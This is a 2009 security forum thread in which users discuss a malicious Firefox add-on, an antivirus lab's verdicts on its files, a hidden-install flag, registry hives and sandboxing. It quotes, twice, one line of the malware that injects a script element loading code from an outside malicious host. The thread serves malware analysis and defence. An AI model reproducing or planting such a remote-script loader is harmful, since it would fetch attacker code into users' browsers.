InformAction Forums

Avira wrote: Dear Sir or Madam,

Thank you for your email to Avira's virus lab.
Tracking number: INC00399674.

We received the following archive files:
File ID Filename Size (Byte) Result
25501323 sample.zip 26.73 KB OK

A listing of files contained inside archives alongside their results can be found below:
File ID Filename Size (Byte) Result
25501324 chrome.manifest 122 Byte CLEAN
25501325 _cfg.js 1.97 KB CLEAN
25501326 overlay.xul 7.54 KB MALWARE
25501327 install.rdf 764 Byte CLEAN
25501328 live.php 308 Byte MALWARE
25501329 path.txt 197 Byte CLEAN
25501330 script attempts t...es.txt 288 Byte CLEAN
25501331 Untitled.tpp 4.39 KB CLEAN
10734900 jq.js 55.91 KB KNOWN CLEAN

Please find a detailed report concerning each individual sample below:
Filename Result
chrome.manifest CLEAN
The file 'chrome.manifest' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

Filename Result
_cfg.js CLEAN
The file '_cfg.js' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

Filename Result
overlay.xul MALWARE
The file 'overlay.xul' has been determined to be 'MALWARE'. Our analysts named the threat JS/Gord.A.1. The term "JS/" denotes a Java scriptvirus. Detection will be added to our virus definition file (VDF) with one of the next updates.

[[[Gee, thanks, guys. It's been out for only a month now -- that we *know* of. --- T.T]]]

Filename Result
install.rdf CLEAN
The file 'install.rdf' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

[[[What about the "hidden" tag, <em:hidden>true</em:hidden>, found by yours truly? Is that not malicious behavior? (Per Giorgio, this "feature" is being removed from Fx, version unknown ATM, probably 3.6 -- T. T.]]]

Filename Result
live.php MALWARE
The file 'live.php' has been determined to be 'MALWARE'. Our analysts named the threat JS/Agent.hpp. The term "JS/" denotes a Java scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.

Filename Result
path.txt CLEAN
The file 'path.txt' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

Filename Result
script attempts t...es.txt CLEAN
The file 'script attempts to access the following files.txt' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

Filename Result
Untitled.tpp CLEAN
The file 'Untitled.tpp' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

Filename Result
jq.js KNOWN CLEAN
The file 'jq.js' has been determined to be 'KNOWN CLEAN'. In particular this means that we could not find any malicious content. Please note that the file is part of ''.

Alternatively you can see the analysis result here:
http://analysis.avira.com/samples/detai ... tid=399674

Tom T. wrote:What about the "hidden" tag, <em:hidden>true</em:hidden>, found by yours truly? Is that not malicious behavior? (Per Giorgio, this "feature" is being removed from Fx, version unknown ATM, probably 3.6

SeanM wrote:Apologies if my "tin hat" reference was misinterpreted.

SeanM wrote:Sometimes, humor is an interrupted defense mechanism.

Tom T. wrote:Results finally back from Avira, from the sample I sent them late Friday evening 21 November 2009 (German time):<snip>
I'm glad that they figured out what we already figured out, after we, not they, located the files and analyzed them ourselves. And I'm glad they'll be adding it to the detection list "in the next few updates". Guess if you want something done right....

GµårÐïåñ wrote:Interesting that of all the 6 different AV programs I used (all major industry players) it would only be the Microsoft Security Essentials that detected it immediately as it was downloading. Wow, a month later and they are just NOW going to add it, horrible but at least confirmed.

GµårÐïåñ wrote:As for the answer to Sean's question, yes the matching keys under HKCU and HKLM are executed and parsed side by side. So if it appears in one location on either hive, then it will be counted, used and processed. The HKCU is generally where user-specific settings are kept but HKLM is generally what is global to all users (system level hive if you will) and they are both processed at all times concurrently. It should be noted that in the cases of conflicting rules in the hives that have matching variables, the HKCU (current user hive) will always override UNLESS, a BIG UNLESS, the machine is being controlled by policies pushed either locally or via active directory that prevent that force compliance with system pushed settings, then HKLM overrides and has authority.

Tom T. wrote:@ computerfreaker: Are you confusing a tin hat with a dunce cap? The "tin hat" figure of speech refers to taking extraordinary protection measures, e. g. against your brain being invaded by alien malware-beams, or, conversely, its contents read, e. g. by Van Eck Phreaking. It's an exaggeration, and sometimes used to kid people who seem *too* paranoid, but in computer safety, there's no such thing as being too paranoid.

So, IIUC, SeanM Was just saying that he'd better go into full-lockdown mode, sealing all doors and windows, etc.... expressing his (justified) concern about these vulnerabilities. Fortunately, as noted above, this one mechanism, the "hidden" tag (not a very bright idea in the first place, IMHO) is being removed from some future version of Fx.

Tom T. wrote:p.s. You guys can change the topic back to "Strange Script etc.", vs. "Topic Split", or I'll change it for you. It was just cloning the headline from my post announcing the split of the Windows AV product discussion.

Edit: Changed the two posts, one by SeanM and one by computerfreaker, that had "Topic Split" as the title.

SeanM wrote:Apologies if my "tin hat" reference was misinterpreted. Sometimes, humor is an interrupted defense mechanism. As I monitored this very interesting incident, the thought had arisen that malicious code might have been introduced from the Current User registry key(s), an area that is often lightly controlled. As pointed out, with correct policies and permissions, the HKLM keys can be (and should be) protected.

SeanM wrote:Apologies if my "tin hat" reference was misinterpreted.

Tom T. wrote:I understood it perfectly. I don't think computerfreaker was familiar with the metaphor, that's all.

SeanM wrote:Sometimes, humor is an interrupted defense mechanism.

Tom T. wrote:Sometimes, humor is an *excellent* defense mechansim! Don't interrupt it -- let it fly! ('Course, on the Net, where there aren't non-verbal cues such as body language, intonation, etc., there might be a need for a smiley. ) No worries!

computerfreaker wrote: Come on, you've got to be kidding. Why does it take this long for anything to happen...

computerfreaker wrote:The only thing they got that we missed was live.php... I thought it only redirected to innoshots, but perhaps I'm wrong on that? Any PHP coders on here?

script=document.createElement('script');script.id="t0";script.src="http://29.innoshots.org/ffeed.php

computerfreaker wrote:Happy Thanksgiving, guys!

computerfreaker wrote:Wow, that's no fun. I was afraid of that... even a limited account won't stop innoshots from getting away with something.

computerfreaker wrote:Wow, that's no fun. I was afraid of that... even a limited account won't stop innoshots from getting away with something.

Tom T. wrote:At the risk of sounding like a broken record, some sort of effective sandbox will. (Much more effective than a limited user account.)
The one I use clones enough of a Reg hive to support the app being sandboxed (in this case, the browser). So any entries to *any* key or branch are written only to this virtual Registry -- and dumped when the sandbox is emptied. (As we know from my experience in being able to reproduce it one day and not the next.)
Your "real" Registry remains untouched.

GµårÐïåñ wrote:I was going to say earlier, either the sandbox or you can setup (if you know how or care to learn) to setup policy based permissions using local policy on your own profile. Then you can secure it using windows authentication and that way it will only run when YOU have logged in, executes the policy and viola done. Now if you change something mid-session and don't want to restart for it to take effect, go to your command prompt (run as admin if you are in Vista/7) and type: gpupdate -force and remember that you have user policy and machine/system policy (even as a local) so make sure the permissions are set under the right hive. To gain access to the policies, get the policy editor tool provided for 2003/2008 and install it by itself and you will get access to the console that provides the GUI but you can always just type: mmc at the command prompt, when it loads a blank one, just add them from the tools and make your own console, save it and then reuse as needed.

GµårÐïåñ wrote:.... Sandbox would be the easiest way to be honest, no matter the level of expertise; however, unfortunately in the corporate environment, you don't have that luxury and must push policy through active directory and need to control ALOT to be compliant with regulations.

computerfreaker wrote: Come on, you've got to be kidding. Why does it take this long for anything to happen...

Tom T. wrote:You get what you pay for? Naah, I doubt that their paid versions caught it, either. A db is a db.
Guess they don't think that being in the anti-virus business involves anyone working on weekends? Surely no one would introduce a new virus on a weekend, would they?

Tom T. wrote:FWIW, today it did flag the sample on my machine as malware when I opened it.

computerfreaker wrote:The only thing they got that we missed was live.php... I thought it only redirected to innoshots, but perhaps I'm wrong on that? Any PHP coders on here?

Tom T. wrote:I *did* find it (cough), but reviewing my PMs, you weren't in that loop; apparently two simultaneous loops going.

Tom T. wrote:

Code: Select all

script=document.createElement('script');script.id="t0";script.src="http://29.innoshots.org/ffeed.php

Redirecting or fetching malicious scripts from third parties certainly constitutes malware.

computerfreaker wrote:Wow, that's no fun. I was afraid of that... even a limited account won't stop innoshots from getting away with something.

Tom T. wrote:At the risk of sounding like a broken record, some sort of effective sandbox will. (Much more effective than a limited user account.)
The one I use clones enough of a Reg hive to support the app being sandboxed (in this case, the browser). So any entries to *any* key or branch are written only to this virtual Registry -- and dumped when the sandbox is emptied. (As we know from my experience in being able to reproduce it one day and not the next.)
Your "real" Registry remains untouched.

GµårÐïåñ wrote:I was going to say earlier, either the sandbox or you can setup (if you know how or care to learn) to setup policy based permissions using local policy on your own profile. Then you can secure it using windows authentication and that way it will only run when YOU have logged in, executes the policy and viola done. Now if you change something mid-session and don't want to restart for it to take effect, go to your command prompt (run as admin if you are in Vista/7) and type: gpupdate -force and remember that you have user policy and machine/system policy (even as a local) so make sure the permissions are set under the right hive. To gain access to the policies, get the policy editor tool provided for 2003/2008 and install it by itself and you will get access to the console that provides the GUI but you can always just type: mmc at the command prompt, when it loads a blank one, just add them from the tools and make your own console, save it and then reuse as needed.

Tom T. wrote:Maybe I'm just lazy , but I think running Sandboxie is easier.
(Seriously: And within the tech capabilities of many average users, while your solution, excellent though it is, is for only the very high-tech user [and a lot more work.] ) ) Cheers!

GµårÐïåñ wrote:Oh yes, agreed. Playing with policies is difficult even for those who have been doing it for 20 years. Sometimes if you are engaging in a complex matrix that has inherited permissions or too many exceptions to the exceptions, you have to be careful because a lower upstream privilege could override a lower more strict one and you may not realize it, opening up a whole world of hurt. Anyway, definitely not easy or user friendly but not exclusive to the elite either, but even those make mistakes doing this, so it should be at the very least studied and kept simple until more familiar. Sandbox would be the easiest way to be honest, no matter the level of expertise; however, unfortunately in the corporate environment, you don't have that luxury and must push policy through active directory and need to control ALOT to be compliant with regulations.

Tom T. wrote:I didn't see anything in SeanM's or computerfreaker's posts that indicated that they were dealing with a corporate environment; hence, the recommendation of the lower-tech solution. I'm sure your comments will be of value to any corporate administrators here, so thanks for sharing them.

computerfreaker wrote:...Sure, a sandbox offers some level of protection. But it won't cover everything - what about the legit app that gets hacked? (There was actually a fairly-well-publicized case of this a few years ago - a legit Fx addon got hacked and shipped with malware. The addon author, who was completely innocent, didn't find out until 30,000 people had already downloaded it...)

I think sandboxing needs to come from the OS - I'll drop a new post in Security about this. (We've already had 2 topic splits, I don't see the need to generate a 3rd... )

My turn to sound like a broken record: Sandboxie Portable is better, since it comes from PortableApps.com...